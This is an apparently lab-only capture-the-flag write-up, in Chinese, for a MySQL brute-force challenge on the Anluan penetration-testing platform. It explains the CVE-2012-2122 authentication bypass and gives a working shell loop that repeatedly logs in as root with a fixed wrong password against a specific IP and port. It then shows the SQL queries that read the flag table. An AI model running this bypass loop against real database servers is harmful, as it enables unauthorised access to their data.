安鸾渗透实战平台——暴力破解(Mysql暴力破解 (200分)
漏洞环境安鸾渗透实战平台——暴力破解(Mysql暴力破解)kali虚拟机分析题目1、从图上作者告诉我们要使用MySQL漏洞,最开始没明白是什么意思,去拿MSF的mysql爆破模块去测试了一下,得到密码,拿去使用时出现了问题提示密码错误:又试了几次发现每次爆破的密码都不一样...
·
漏洞环境
安鸾渗透实战平台——暴力破解(Mysql暴力破解)
kali虚拟机
分析题目
1、从图上作者告诉我们要使用MySQL漏洞,最开始没明白是什么意思,去拿MSF的mysql爆破模块去测试了一下,得到密码,拿去使用时出现了问题
提示密码错误:
又试了几次发现每次爆破的密码都不一样
题目提示了,利用漏洞,以前有个MySQL的漏洞,这里直接使用linux的for循环去测试
Mysql 身份认证绕过漏洞(CVE-2012-2122)
当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。 也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。按照公告说法大约256次就能够蒙对一次。
for i in `seq 1 1000`; do mysql -uroot -paaaaa -h 118.190.133.35 -P3308 ; done
for
: 利用linux的shell创造一个for循环
i
: 循环的变量
seq 1 1000
:表示循环是从1-1000
do
:执行
mysql -uroot -paaaaa
:mysql的登录命令,意思是用户名是root,密码是aaaaa
-h 118.190.133.35 -P3308
:-h是IP ;-P是端口
done
:表示循环结束
进去了,看一下表的信息,发现有个test
没有,看看whalwl把
use whalwl;
show tables;
select * from flag;
更多推荐
已为社区贡献2条内容
所有评论(0)